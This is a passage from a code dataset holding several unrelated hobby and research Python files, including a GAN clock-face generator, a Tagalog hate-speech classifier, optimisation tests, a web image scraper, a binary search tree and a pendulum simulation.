== 1:\n r2 = 70\n elif clkSize < 1:\n r2 = 60\n if randSeed is None:\n np.random.seed()\n r = np.random.randint(18)\n r2 -= r#\n #Now r1 will be 7 to 14 smaller\n if randSeed is None:\n np.random.seed()\n r = np.random.randint(7) + 5\n r1 = r2-r\n #Should r1 (inner radius) be made 0? \n if randSeed is None:\n np.random.seed()\n if(np.random.randint(3) == 0):\n r1 = 0\n #r1 = 0\n #Now based on r1, one may shift cX and cY\n cX = getCenter(82-r2, randSeed)\n cY = getCenter(82-r2, randSeed)\n #print(82-r2, cX, cY)\n if randSeed is None:\n np.random.seed()\n lw2 = np.random.randint(4 if r2>60 else 2) + 2\n if randSeed is None:\n np.random.seed()\n lw1 = np.random.randint(2) + 1\n \n #if r2 < 60\n \n mR = r2 if r1 == 0 else r1\n #Now lets change tickA (its width) and tickW (it's length)\n if randSeed is None:\n np.random.seed()\n tickA = np.random.randint(3) + 1\n tickW = np.random.randint(5) + 3\n if r1 > 40:\n tickW += (r1-40)//10\n #\n if randSeed is None:\n np.random.seed()\n iTickR = np.random.randint(20)\n if iTickR < 5:\n iTickR = None\n else:\n iTickR = mR - iTickR\n \n #Now width and length of needles...\n if randSeed is None:\n np.random.seed()\n mR = mR -5 -np.random.randint(5)\n hR = mR - 6\n hR -= np.random.randint(5)\n \n if randSeed is None:\n np.random.seed()\n mA = 1 + np.random.randint(2)\n hA = mA +1 + np.random.randint(2)\n #if hA > 4:\n # hA = 4\n #h=3, m = 10, simp=True, cX = 90, cY = 90, r1 = 62, r2 = 72, \n # lw1 = 3, lw2 = 3,\n # tickA = 1, tickW = 4, iTickR = 40,\n # hR = 40, hA = 2, mR = 60, mA = 1\n clk, h_m = getClock(h=h, m=m, simp=simp, cX=cX, cY=cY, \n r1=r1, r2=r2, lw1=lw1, lw2=lw2,\n tickA=tickA, tickW=tickW, iTickR=iTickR,\n hR = hR, hA = hA, mR = mR, mA = mA\n ), [h, m]\n if org_r_state is not None:\n np.random.set_state(org_r_state)\n return clk, h_m\n\n\n# In[17]:\n\"\"\"\nfrom tqdm import tqdm\nimport pickle\nopFolder = \"../../../data/clock/\"\nfor i in tqdm(range(1000000)):\n with open(opFolder+str(i)+'.pkl','wb') as f:\n pickle.dump(getRandomClock().transpose(2, 0, 1)/255, f)\"\"\"\n#clk = getRandomClock()\n#import matplotlib.pyplot as plt\n#plt.imshow(clk)\n\n","repo_name":"aknirala/GAN","sub_path":"freezed/diverseClkFaces.py","file_name":"diverseClkFaces.py","file_ext":"py","file_size_in_byte":11282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74388560193","text":"import os\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport torch\nimport torch.nn as nn\nimport math\n\nfrom pytorch_lightning.loggers import TensorBoardLogger\nfrom torchmetrics.functional.classification import hamming_distance, precision, recall, f1_score\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom transformers import AutoTokenizer, AutoModel, AdamW, get_cosine_schedule_with_warmup\nimport pytorch_lightning as pl\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\nimport seaborn as sns\nfrom sklearn.metrics import precision_score, recall_score, f1_score\n\n# import dataset files\ntrain_path = './dataset/train.csv'\nval_path = './dataset/val.csv'\ntest_path = './dataset/test.csv'\ndataset_path = './dataset/mlthsc.csv'\n\ndata_frame = pd.read_csv(dataset_path)\n# print(dataset_data)\n\n# Inspect data # Todo: move to Dataset class\n\nLABELS = ['Age', 'Gender', 'Physical', 'Race', 'Religion', 'Others']\n\nprint(data_frame[LABELS].sum())\n\n# Plot dataset\nplt.xlabel(\"Labels\")\nplt.ylabel(\"No. of instances\")\nplt.title(\"Labels\")\ndata_frame[LABELS].sum().sort_values().plot(kind=\"barh\")\n# plt.show()\n\nclass MLTHS_Dataset(Dataset):\n\n def __init__(self, data_path, tokenizer, labels, max_token_len: int = 128, train_ratio=0.6, test_ratio=0.3):\n self.data_path = data_path\n self.tokenizer = tokenizer\n self.labels = labels\n self.max_token_len = max_token_len\n # self.train_ratio = train_ratio\n # self.test_ratio = test_ratio\n self._prepare_data()\n\n def _prepare_data(self):\n data = pd.read_csv(self.data_path)\n self.data = data\n\n # --------------------- TODO: Normalize ------------------------------------------------\n\n def comment2(self):\n\n # print(\"prepare data\")\n # print(data)\n\n # # Calculate the number of samples for training, testing, and validation\n # total_size = len(data)\n # train_size = int(total_size * self.train_ratio)\n # test_size = int(total_size * self.test_ratio)\n # val_size = total_size - train_size - test_size\n #\n # # Split the data into training, testing, and validation sets\n # train_data = data.sample(n=train_size, random_state=7)\n # remaining_data = data.drop(train_data.index)\n # test_data = remaining_data.sample(n=test_size, random_state=42)\n # val_data = remaining_data.drop(test_data.index)\n\n # self.train_data = train_data\n # self.test_data = test_data\n # self.val_data = val_data\n return None\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, index):\n item = self.data.iloc[index]\n text = str(item['Text'])\n labels = item[self.labels]\n\n # Tokenize the text\n encoding = self.tokenizer.encode_plus(text,\n add_special_tokens=True,\n return_tensors='pt',\n padding='max_length',\n truncation=True,\n max_length=self.max_token_len,\n return_token_type_ids=False,\n return_attention_mask=True\n )\n\n # print(encoding[\"input_ids\"].shape, encoding[\"attention_mask\"].shape)\n\n # token_counts = []\n # for _, row in self.data.iterrows():\n # token_count = len(tokenizer.encode(\n # row[\"Text\"],\n # max_length=512,\n # truncation=True\n # ))\n # token_counts.append(token_count)\n # sns.histplot(token_counts)\n # plt.xlim([0, 128])\n\n return {\n 'input_ids': encoding['input_ids'].flatten(),\n 'attention_mask': encoding['attention_mask'].flatten(),\n 'labels': torch.tensor(labels, dtype=torch.float32)\n }\n\nbert_model = \"gklmip/bert-tagalog-base-uncased\"\ntokenizer = AutoTokenizer.from_pretrained(bert_model)\n\nmlths_ds_train = MLTHS_Dataset(train_path, tokenizer, labels=LABELS)\nmlths_ds_val = MLTHS_Dataset(val_path, tokenizer, labels=LABELS)\n\ndef comment():\n return 0\n # mlths_ds_test = MLTHS_Dataset(test_path, tokenizer, labels=LABELS)\n\n # print(dataset_data.iloc[0])\n # print(mlths_ds_train.__getitem__(0))\n\n # train_ids = set(mlths_ds_train.data['ID'])\n # val_ids = set(mlths_ds_val.data['ID'])\n\n # overlapping_ids = train_ids.intersection(val_ids)\n #\n # if not overlapping_ids:\n # print(\"No overlapping IDs between training and validation datasets.\")\n # else:\n # print(\"There are overlapping IDs between training and validation datasets.\")\n\n# Data Module\n\nclass MLTHS_Data_Module(pl.LightningDataModule):\n\n def __init__(self, train_path, val_path, test_path, labels, model_name, batch_size: int = 8, max_token_len: int = 128):\n super().__init__()\n self.train_path = train_path\n self.val_path = val_path\n self.test_path = test_path\n self.labels = labels\n self.model_name = model_name\n self.batch_size = batch_size\n self.max_token_len = max_token_len\n self.tokenizer = AutoTokenizer.from_pretrained(model_name)\n\n def setup(self, stage=None):\n if stage in (None, \"fit\"):\n self.train_dataset = MLTHS_Dataset(self.train_path, self.tokenizer, self.labels)\n self.val_dataset = MLTHS_Dataset(self.val_path, self.tokenizer, self.labels)\n self.test_dataset = MLTHS_Dataset(self.test_path, self.tokenizer, self.labels)\n\n if stage == 'predict':\n self.val_dataset = MLTHS_Dataset(self.val_path, self.tokenizer, self.labels)\n\n def train_dataloader(self):\n return DataLoader(self.train_dataset, batch_size=self.batch_size, num_workers=2, shuffle=True)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset, batch_size=self.batch_size, num_workers=2, shuffle=False, persistent_workers=True)\n\n def test_dataloader(self):\n return DataLoader(self.test_dataset, batch_size=self.batch_size, num_workers=2, shuffle=False)\n \n \n# Model\n\nclass MLTHSClassifier(pl.LightningModule):\n\n def __init__(self, config: dict, n_training_steps=None, n_warmup_steps=None):\n super().__init__()\n self.config = config\n self.pretrained_model = AutoModel.from_pretrained(config['model_name'], return_dict=True)\n self.hidden = nn.Linear(self.pretrained_model.config.hidden_size, self.pretrained_model.config.hidden_size)\n self.classifier = nn.Linear(self.pretrained_model.config.hidden_size, self.config['n_labels'])\n nn.init.xavier_uniform_(self.hidden.weight)\n nn.init.xavier_uniform_(self.classifier.weight)\n self.loss_function = nn.BCEWithLogitsLoss(reduction='mean')\n self.dropout = nn.Dropout()\n\n def forward(self, input_ids, attention_mask, labels=None):\n output = self.pretrained_model(input_ids=input_ids, attention_mask=attention_mask)\n cls_embedding = output.last_hidden_state[:, 0, :]\n cls_embedding = F.sigmoid(cls_embedding)\n logits = self.classifier(cls_embedding)\n loss = 0\n if labels is not None:\n loss = self.loss_function(logits.view(-1, self.config['n_labels']), labels.view(-1, self.config['n_labels']))\n return loss, logits\n\n def training_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n self.log(\"train loss\", loss, prog_bar=True, logger=True)\n return {\n 'loss': loss,\n 'predictions': logits,\n 'labels': batch['labels']\n }\n\n def validation_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n self.log(\"validation loss\", loss, prog_bar=True, logger=True)\n return {\n 'val_loss': loss,\n 'predictions': logits,\n 'labels': batch['labels']\n }\n\n def test_step(self, batch, batch_index_):\n loss, logits = self(**batch)\n return logits\n\n def on_training_epoch_end(self, logits):\n\n labels = []\n predictions = []\n\n for logit in logits:\n for out_labels in logit[\"labels\"].detach().cpu():\n labels.append(out_labels)\n for out_predictions in logit[\"predictions\"].detach().cpu():\n predictions.append(out_predictions)\n\n labels = torch.stack(labels).int()\n predictions = torch.stack(predictions)\n\n\n def configure_optimizers(self):\n optimizer = AdamW(self.parameters(), lr=self.config['lr'], weight_decay=self.config['w_decay'])\n total_steps = self.config['train_size'] / self.config['bs']\n warmup_steps = math.floor(total_steps * self.config['warmup'])\n scheduler = get_cosine_schedule_with_warmup(optimizer, warmup_steps, total_steps)\n return [optimizer], [scheduler]\n\n\n# Trainer\n\nmlths_data_module = MLTHS_Data_Module(train_path, val_path, test_path, labels=LABELS, model_name=bert_model)\nmlths_data_module.setup()\ndl = mlths_data_module.train_dataloader()\n\nprint(\"len(dl)\")\nprint(len(dl))\n\n\nif __name__ == '__main__':\n config = {\n 'model_name': bert_model,\n 'n_labels': len(LABELS),\n 'bs': 8,\n 'lr': 2e-5,\n 'warmup': 0.2,\n 'train_size': len(dl),\n 'w_decay': 0.01,\n 'n_epochs': 5\n }\n\n mlths_data_module = MLTHS_Data_Module(train_path, val_path, test_path, labels=LABELS, model_name=bert_model, batch_size=config['bs'])\n mlths_data_module.setup()\n dl = mlths_data_module.train_dataloader()\n\n device = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n\n model = MLTHSClassifier(config)\n idx = 0\n input_ids = mlths_ds_train.__getitem__(idx)['input_ids']\n attention_mask = mlths_ds_train.__getitem__(idx)['attention_mask']\n LABELS = mlths_ds_train.__getitem__(idx)['labels']\n loss, output = model(input_ids.unsqueeze(dim=0), attention_mask.unsqueeze(dim=0), LABELS.unsqueeze(dim=0))\n print(loss, output)\n print(LABELS.shape, output.shape, output)\n\n checkpoint_callback = ModelCheckpoint(\n dirpath=\"checkpoints\",\n filename=f\"{config['n_epochs']}-val_loss:.2f\",\n save_top_k=1,\n verbose=True,\n monitor=\"validation loss\",\n mode=\"min\"\n )\n\n logger = TensorBoardLogger(\"lightning_logs\", name=\"hate-speech\")\n\n trainer = pl.Trainer(max_epochs=config['n_epochs'], num_sanity_val_steps=2, log_every_n_steps=5)\n trainer.fit(model, mlths_data_module)\n\n trainer.test()\n\n trained_model = MLTHSClassifier.load_from_checkpoint(\n trainer.checkpoint_callback.best_model_path,\n n_labels=len(LABELS)\n )\n\n trained_model.eval()\n trained_model.freeze()\n\n test_comment = \"Masyadong babae tong mga iglesia na ito\"\n encoding = tokenizer.encode_plus(\n test_comment,\n add_special_tokens=True,\n max_length=128,\n return_token_type_ids=False,\n padding=\"max_length\",\n return_attention_mask=True,\n return_tensors='pt',\n )\n _, test_prediction = trained_model(encoding[\"input_ids\"], encoding[\"attention_mask\"])\n test_prediction = test_prediction.flatten().numpy()\n for label, prediction in zip(LABELS, test_prediction):\n print(f\"{label}: {prediction}\")","repo_name":"syke9p3/BERT-MLTHSC","sub_path":"lumang_code/second_try.py","file_name":"second_try.py","file_ext":"py","file_size_in_byte":11430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32860958202","text":"import pytest\n\nfrom pymoo.optimize import minimize\nfrom pymoo.problems import get_problem\nfrom pymoo.indicators.igd import IGD\nfrom pymoode.algorithms import GDE3, NSDE\nfrom pymoode.operators.dex import DEX\nfrom pymoode.operators.dem import DEM\nfrom pymoo.algorithms.moo.nsga2 import NSGA2\nfrom pymoo.operators.mutation.pm import PM\nfrom pymoode.survival import RankAndCrowding, ConstrRankAndCrowding\n\n\n@pytest.mark.parametrize('survival', [RankAndCrowding, ConstrRankAndCrowding])\n@pytest.mark.parametrize('crowding_func', [\"mnn\", \"2nn\", \"cd\", \"pcd\", \"ce\"])\ndef test_multi_run(survival, crowding_func):\n \n problem = get_problem(\"truss2d\")\n\n NGEN = 50\n POPSIZE = 50\n SEED = 5\n \n gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=survival(crowding_func=crowding_func))\n\n res_gde3 = minimize(problem,\n gde3,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n assert len(res_gde3.opt) > 0\n\n\n@pytest.mark.parametrize('crossover', [DEX(), DEM()])\ndef test_multi_frankstein(crossover):\n \n problem = get_problem(\"truss2d\")\n\n NGEN = 100\n POPSIZE = 100\n SEED = 5\n \n frank = NSGA2(pop_size=POPSIZE, crossover=crossover)\n\n res_frank = minimize(problem,\n frank,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n assert len(res_frank.opt) > 0\n\n\ndef test_gde3_pm_run():\n \n problem = get_problem(\"truss2d\")\n\n NGEN = 50\n POPSIZE = 50\n SEED = 5\n \n gde3pm = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=RankAndCrowding(crowding_func=\"pcd\"), genetic_mutation=PM())\n\n res_gde3pm = minimize(problem,\n gde3pm,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n assert len(res_gde3pm.opt) > 0\n \n gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=RankAndCrowding(crowding_func=\"pcd\"))\n \n res_gde3 = minimize(problem,\n gde3,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n assert len(sum(res_gde3pm.F - res_gde3.F)) >= 1e-3\n \n\ndef test_multi_perf():\n \n problem = get_problem(\"truss2d\")\n igd = IGD(pf=problem.pareto_front(), zero_to_one=True)\n \n NGEN = 250\n POPSIZE = 100\n SEED = 5\n \n gde3 = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=RankAndCrowding(crowding_func=\"cd\"))\n\n res_gde3 = minimize(problem,\n gde3,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n igd_gde3 = igd.do(res_gde3.F)\n assert abs(igd_gde3 - 0.005859828655308572) <= 1e-8\n \n gde3p = GDE3(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=RankAndCrowding(crowding_func=\"pcd\"))\n\n res_gde3p = minimize(problem,\n gde3p,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n igd_gde3p = igd.do(res_gde3p.F)\n assert abs(igd_gde3p - 0.004744463013355145) <= 1e-8\n \n nsde = NSDE(pop_size=POPSIZE, variant=\"DE/rand/1/bin\", CR=0.5, F=(0.0, 0.9), de_repair=\"bounce-back\",\n survival=RankAndCrowding(crowding_func=\"pcd\"))\n \n res_nsde = minimize(problem,\n nsde,\n ('n_gen', NGEN),\n seed=SEED,\n save_history=False,\n verbose=False)\n \n igd_nsde = igd.do(res_nsde.F)\n assert abs(igd_nsde - 0.004562068055351625) <= 1e-8","repo_name":"mooscaliaproject/pymoode","sub_path":"tests/test_multi.py","file_name":"test_multi.py","file_ext":"py","file_size_in_byte":4355,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"61"} +{"seq_id":"24585100573","text":"#\n# Discount script\n#\n# Author: @badlydrawnrob\n# Source: https://youtu.be/Kh1Tr1eYghA\n\n\ndef discount(original, sale):\n # First calulate the difference in price\n difference = original - sale\n # Next, divide the difference by original\n # to get the percent of change as a decimal\n discountDecimal = difference / original\n # Finally, we need to multiply by 100\n # to get the final percentage amount of discount.\n # You can't use % or \\%: instead use %%\n discountPercent = discountDecimal * 100\n print(\"{} discount\".format(discountPercent))\n\n\ndiscount(30, 10)\n","repo_name":"badlydrawnrob/python-playground","sub_path":"personal/discount.py","file_name":"discount.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33901232245","text":"import requests\nfrom bs4 import BeautifulSoup\n\n# get movie images\nfor year in range(2019, 2014, -1):\n URL = f\"https://search.daum.net/search?w=tot&q={year}%EB%85%84%EC%98%81%ED%99%94%EC%88%9C%EC%9C%84&DA=MOR&rtmaxcoll=MOR\"\n \n res = requests.get(URL)\n res.raise_for_status()\n\n soup = BeautifulSoup(res.text, 'lxml')\n images = soup.find_all(\"img\", attrs={'class': \"thumb_img\"})\n \n for i, image in enumerate(images):\n src = image[\"src\"]\n if src.startswith('//'):\n img_URL = \"https:\" + src\n res_img = requests.get(img_URL)\n res_img.raise_for_status()\n\n with open(f\"img/movie_{year}_{i+1}.jpg\", 'wb') as f:\n f.write(res_img.content)\n if i == 4: \n break","repo_name":"ririro93/web-scraping","sub_path":"nadocoding_scraping/12_daum_movie_img.py","file_name":"12_daum_movie_img.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71718044674","text":"# https://www.geeksforgeeks.org/loops-in-python/ (learn from here)\r\n\r\n'''\r\nwhile True:\r\n print(\"im joey\")\r\n\r\nwhile loop runs till condition becomes false\r\n'''\r\n\r\n\r\njoey=1\r\nwhile joey<10:\r\n print(joey)\r\n joey+=1 # joey=joey+1\r\n\r\n\r\n'''\r\nfor loop\r\n\r\nit can be used in lists,tuples,dict,set,strings\r\n'''\r\n\r\nfor i in range(1,3):\r\n for j in range(1,11):\r\n print(i*j,end=\" \")\r\n print()","repo_name":"xp1oit3r/Python","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42047932217","text":"import time\nimport math\n\n\ndef prime(n):\n start = time.time()\n for num in range(2, int(math.sqrt(n+1))):\n x = 0\n while x < n:\n for i in range(2, n+1):\n x = num * i\n if x == n:\n stop = time.time()\n print(n, \"is divisible by\", num, \"and\", i)\n print(n, \"is not prime\")\n print(\"time taken is\", stop-start)\n exit()\n stop = time.time()\n print(\"time taken is\", stop - start)\n print(n, \"is prime\")\n\n\ny = int(input(\"Enter value of n\"))\nprime(y)\n","repo_name":"vivekjoshi-96/Interview_questions","sub_path":"prime.py","file_name":"prime.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40923875432","text":"from __future__ import annotations\n\nfrom utils import hash_content, random_word, create_key, parse_key, verify_hash\nfrom config import id_config\n\nfrom collections import Counter\n\nimport random\n\n\nHASH_DIFFICULTY = id_config[\"hash_difficulty\"]\nNONCE_LIMIT = id_config[\"nonce_limit\"]\nUSERNAME_LIMIT = id_config[\"username_char_limit\"]\n\n\nclass ID(object):\n\n def __init__(self, username: str, public_key: str, nonce: int = None,\n timestamp: str = None, hash_value: str = None):\n\n if not isinstance(username, str):\n raise TypeError(\"\\\"username\\\" must be of type str\")\n elif not isinstance(public_key, str):\n raise TypeError(\"\\\"public_key\\\" must be of type str\")\n elif not (nonce is None or isinstance(nonce, int)):\n raise TypeError(\"\\\"nonce\\\" must be of type int\")\n elif not (timestamp is None or isinstance(timestamp, str)):\n raise TypeError(\"\\\"timestamp\\\" must be of type str\")\n elif not (hash_value is None or isinstance(hash_value, str)):\n raise TypeError(\"\\\"hash_value\\\" must be of type str\")\n\n self.__username = username\n self.__public_key = public_key\n\n if all([i is None for i in [nonce, timestamp, hash_value]]):\n # If all extra values are None, hash the content\n\n self.__hash()\n elif None in [nonce, timestamp, hash_value]:\n # If one of the extra values has a value, all must have,\n # otherwise raise an exception\n\n raise ValueError(\n \"\\\"nonce\\\", \\\"timestamp\\\" and \\\"hash_value\\\" are dependent, \" +\n \"either all of them have a value or none of them do.\")\n else:\n self.__nonce = nonce\n self.__timestamp = timestamp\n self.__hash_value = hash_value\n\n def __hash(self) -> None:\n content = {\n \"username\": self.__username,\n \"public_key\": self.__public_key\n }\n\n content = hash_content(content, HASH_DIFFICULTY, 10**6)\n\n self.__nonce = content[\"nonce\"]\n self.__timestamp = content[\"timestamp\"]\n self.__hash_value = content[\"hash_value\"]\n\n def to_dict(self) -> dict:\n \"\"\"Returns all class paramaters in a dictionary form\"\"\"\n\n return {\n \"username\": self.__username,\n \"public_key\": self.__public_key,\n \"nonce\": self.__nonce,\n \"timestamp\": self.__timestamp,\n \"hash_value\": self.__hash_value\n }\n\n def get_content(self) -> dict:\n \"\"\"Returns only the class paramaters that can be hashed\"\"\"\n\n return {\n \"username\": self.__username,\n \"public_key\": self.__public_key\n }\n\n def is_valid(self) -> bool:\n \"\"\"Verfies if ID is valid or not\"\"\"\n\n if len(self.__username) > USERNAME_LIMIT:\n return False\n\n if self.__nonce > NONCE_LIMIT:\n return False\n\n content = {\n \"username\": self.__username,\n \"public_key\": self.__public_key,\n \"nonce\": self.__nonce,\n \"timestamp\": self.__timestamp,\n }\n\n if len(self.__hash_value) < 6:\n return False\n\n if self.__hash_value[:HASH_DIFFICULTY] != \"0\" * HASH_DIFFICULTY:\n return False\n\n if verify_hash(content, self.__hash_value) is False:\n return False\n\n return True\n\n @staticmethod\n def is_id_valid(userid: dict) -> bool:\n \"\"\"Verfies if a dictionary version of an ID is valid or not\"\"\"\n\n required_keys = [\"username\", \"public_key\",\n \"nonce\", \"timestamp\", \"hash_value\"]\n\n if Counter(userid.keys()) != Counter(required_keys):\n # If, doesn't matter the order, the keys are not all\n # the same as the expected ones, return False\n\n return False\n\n expected_types = {\n \"username\": str,\n \"public_key\": str,\n \"nonce\": int,\n \"timestamp\": str,\n \"hash_value\": str\n }\n\n if any([not isinstance(value, expected_types[key]) for key, value in userid.items()]):\n # Returns false if any of the id values have a\n # different type other than the expected\n\n return False\n\n id = ID(**userid)\n\n if id.is_valid() is False:\n return False\n\n return True\n\n @staticmethod\n def get_random(valid: bool = True) -> dict:\n \"\"\"Returns a random ID with it's corresponding private key\"\"\"\n\n key = create_key()\n pubkey = parse_key(key.publickey())\n username = random_word(random.randint(1, USERNAME_LIMIT))\n\n if valid is False:\n username = \"A\" * (USERNAME_LIMIT+1)\n\n return {\n \"private_key\": parse_key(key),\n \"id\": ID(username, pubkey)\n }\n","repo_name":"mateusap1/athena-old","sub_path":"model/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":4839,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"2511307513","text":"import numpy as np\nimport scipy.integrate as spi\nimport matplotlib.pyplot as plt\n\n\ndef F(Z, t):\n return np.array([\n Z[2],\n Z[3],\n g * np.cos(Z[1]) + (Z[3] ** 2 - k / m) * Z[0] + k * l0 / m - K * Z[2] / m,\n -g / Z[0] * np.sin(Z[1]) - (2 * Z[3] + K / m) * Z[2] / Z[0]\n ])\n\n\ng = 9.81\nm = 5\nk = 500\nl0 = 5e-1\nD = 2.0e-1\nmu = 1.49\nK = 3 * np.pi * mu * D\n\nT = 10\nZ0 = np.array([\n 6e-1,\n 3 * np.pi / 4,\n 0,\n 0\n])\n\nt = np.linspace(0, T, int(T * 1000))\nZ = spi.odeint(F, Z0, t)\n\nfig, ax = plt.subplots(subplot_kw={'projection': 'polar'})\nax.plot(Z[:, 1], Z[:, 0])\nax.set_theta_zero_location(\"S\")\nax.grid(True)\nax.set_title(f\"Mouvement d'une boule de {m}kg de diamètre {D}m accroché à un pendule à ressort dans de la glycérine\")\nplt.show()\n","repo_name":"torpill40/clemenceau","sub_path":"yolooo/.ipynb_checkpoints/pendule_ressort-checkpoint.py","file_name":"pendule_ressort-checkpoint.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29031632843","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.left = None\n self.right = None\n\nclass BST:\n def __init__(self):\n self.root = None\n\n def Insert(self,value):\n self.root = self.__Insert(self.root,value)\n\n def __Insert(self,root,value):\n if root is None:\n root = Node(value)\n else:\n if value < root.value:\n root.left = self.__Insert(root.left,value)\n else:\n root.right = self.__Insert(root.right,value)\n\n return root\n\n def Inorder(self):\n return self.__Inorder(self.root)\n\n def __Inorder(self,root):\n if root:\n self.__Inorder(root.left)\n print(root.value)\n self.__Inorder(root.right)\n\n def Preorder(self):\n return self.__Preorder(self.root)\n\n def __Preorder(self,root):\n if root:\n print(root.value)\n self.__Preorder(root.left)\n self.__Preorder(root.right)\n\n def Postorder(self):\n return self.__Postorder(self.root)\n\n def __Postorder(self, root):\n if root:\n self.__Postorder(root.left)\n self.__Postorder(root.right)\n print(root.value)\n\n def Height(self):\n return self.__Height(self.root)\n\n def __Height(self,root):\n if root is None:\n return 0\n else:\n lHeight = self.__Height(root.left)\n rHeight = self.__Height(root.right)\n if lHeight > rHeight:\n return lHeight+1\n else:\n return rHeight+1\n\n def Findmin(self):\n x = self.__Findmin(self.root)\n print(x.value)\n\n def __Findmin(self,root):\n while root is not None:\n if root.left is None:\n break\n root = root.left\n return root\n\n def Findmax(self):\n x = self.__Findmax(self.root)\n print(x.value)\n\n def __Findmax(self,root):\n while root is not None:\n if root.right is None:\n break\n root = root.right\n return root\n\n def Successor(self):\n a = self.__Successor(self.root)\n return a.value\n\n def __Successor(self,root):\n return self.__Findmin(root.right)\n\n def Predeccessor(self):\n a = self.__Predeccessor(self.root)\n return a.value\n\n def __Predeccessor(self,root):\n return self.__Findmin(root.left)\n\n def Delete(self,value):\n return self.__Delete(self.root,value)\n\n def __Delete(self,root,value):\n if root is None:\n return root\n\n if value < root.value:\n root.left = self.__Delete(root.left,value)\n\n elif value > root.value:\n root.right = self.__Delete(root.right,value)\n\n else:\n if root.left is None:\n temp = root.right\n root = None\n return temp\n elif root.right is None:\n temp = root.left\n root = None\n return temp\n\n temp = self.__Findmin(root.right)\n root.value = temp.value\n root.right = self.__Delete(root.right,temp.value)\n return root\n\n\n\nob = BST()\nob.Insert(5)\nob.Insert(50)\nob.Insert(40)\nob.Insert(70)\nob.Insert(100)\nob.Insert(110)\nprint(\"---------Inorder-----------\")\nob.Inorder()\nprint(\"---------Preorder-----------\")\nob.Preorder()\nprint(\"---------Postorder-----------\")\nob.Postorder()\nprint(\"---------Height-----------\")\nprint(ob.Height())\nprint(\"---------Minimum-----------\")\nob.Findmin()\nprint(\"---------Maximum-----------\")\nob.Findmax()\nprint(\"---------Successor-----------\")\nprint(ob.Successor())\nprint(\"---------Predeccessor-----------\")\n#print(ob.Predeccessor())\nob.Delete(40)\nob.Delete(100)\nprint(\"---------Inorder-----------\")\nob.Inorder()","repo_name":"mans00rahmed/BinarySearchTree-BST","sub_path":"code 10.py","file_name":"code 10.py","file_ext":"py","file_size_in_byte":3832,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23590454180","text":"#!/bin/python3\nfrom tkinter import *\nfrom random import *\nfrom libcolor import *\n\ns = 10\nmaster = Tk()\n# Window title-bar :)\nmaster.title(\"Change_me\")\ns = 15\nh = s*50\nw = s*50\ncnv = Canvas(master, height=h, width=w)\nbackground = \"black\"\ncnv = Canvas(master, width=h, height=w, bg=background)\ncnv.pack()\nr1, g1, b1 = img.get(0,0)\nfiles = []\nfor i in range(48):\n files.append(PhotoImage(file=\"./frames/frame_\" + str(i) + \".png\"))\nfor f in files:\n for i in range(50):\n for j in range(50):\n r,g,b = f.get(i,j)\n if (r,g,b)!=(r1,g1,b1):\n symbols = ['m', \"a\", 'r', \"i\", \"o\"]\n t = symbols[randint(0,len(symbols)-1)]\n cnv.create_text(i*s,j*s, text = t, fill = color_code(r,g,b), font = ('Engravers MT', s))\n\n\nanimate()\nmaster.mainloop()\n","repo_name":"Agvantibo/School","sub_path":"mari0/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17346079167","text":"#10 - Sir Lancelot's Charge\r\ninput = open('input.txt', 'r')\r\ninputs = input.readlines()\r\ninputInts = [int(i) for i in inputs]\r\ninputInts.sort()\r\nnumAdapters = len(inputInts)\r\ninputInts.append(inputInts[numAdapters-1] +3)\r\n#inputInts.append(inputInts\r\nprint (inputInts)\r\ni, oneJolt, threeJolts, highJoltage = 